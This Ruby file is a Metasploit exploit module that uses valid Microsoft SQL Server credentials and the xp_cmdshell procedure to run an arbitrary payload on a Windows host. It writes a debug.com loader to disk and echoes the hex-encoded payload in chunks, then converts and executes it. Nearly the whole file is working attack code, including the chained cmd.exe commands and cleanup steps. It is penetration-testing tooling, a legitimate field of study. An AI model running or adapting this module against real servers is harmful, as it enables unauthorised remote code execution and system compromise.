##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})

		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using the Windows debug.com method for writing an executable to disk
				and the xp_cmdshell stored procedure. File size restrictions are avoided by 
				incorporating the debug	bypass method presented at Defcon 17 by SecureState.
				Note that this module will leave a metasploit payload in the Windows
				System32 directory which must be manually deleted once the attack is completed.
			},
			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[

					[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0 
			))

		register_options( [
			OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk", 
				File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
			])
		], self.class)
	end

	def exploit

		var_bypass  = rand_text_alpha(8)
		var_payload = rand_text_alpha(8)
		
		debug = false # enable to see the output
		
		if(not mssql_login_datastore) 
			print_status("Invalid SQL Server credentials")
			return
		end
		
		print_status("Warning: This exploit will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
		
		hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]		

		print_status("Writing the debug.com loader to the disk...")
		h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
		h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
		h2b.split(/\n/).each do |line|
			mssql_xpcmdshell("#{line}", false) 
		end

		print_status("Converting the debug script to an executable...")
		mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug) 
		mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug) 
		
		print_status("Uploading the payload, please be patient...")
		idx = 0
		cnt = 500
		while(idx < hex.length - 1)
			mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
			idx += cnt
		end
		
		print_status("Converting the encoded payload...")
		mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug) 
		mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug) 
		mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug) 
		
		print_status("Executing the payload...")
		mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1}) 

		handler
		disconnect
	end
end